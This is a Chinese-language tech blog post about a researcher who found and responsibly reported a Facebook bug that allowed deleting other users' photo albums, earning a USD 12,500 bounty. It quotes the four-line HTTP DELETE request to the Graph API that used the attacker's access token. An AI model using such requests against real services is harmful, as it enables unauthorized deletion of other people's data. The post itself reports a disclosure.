(image credit: Maurizio Pesce)

全球最多人使用、身為社交平台龍頭的 Facebook，或許比想像中更脆弱。來自印度的網路技術員 Laxman Muthiyah，早前使用看來相當簡單的方法，配合四句指令就成功鑽進 Facebook 漏洞，可以刪除別人帳戶內的照片！

那四句指令是這樣︰

Request :-
DELETE /<Victim’s_photo_album_id> HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

我不認識有關技術，但如果你有興趣了解的話，可以到「How I Hacked Your Facebook Photos」瀏覽，或看以下示範影片︰

不過，這位印度人並沒有利用這個漏洞做甚麼壞事，而是馬上通知 Facebook，而他們則在 2 個小時內就解決了這個漏洞，更重要是，還以 USD 12,500，即約港幣 10 萬元答謝他！

相信大家都聽過一些故事，指美國 FBI 之類，會將那些精英黑客收歸旗下，不知道實情是否這樣，但 FB 這個獎勵確實很正面啊，或許會引發一輪黑客挑戰 FB 的浪潮？但話說回來，如果給你刪除別人照片的機會，你會想刪掉甚麼呢？情人節的閃光彈？

via PetaPixel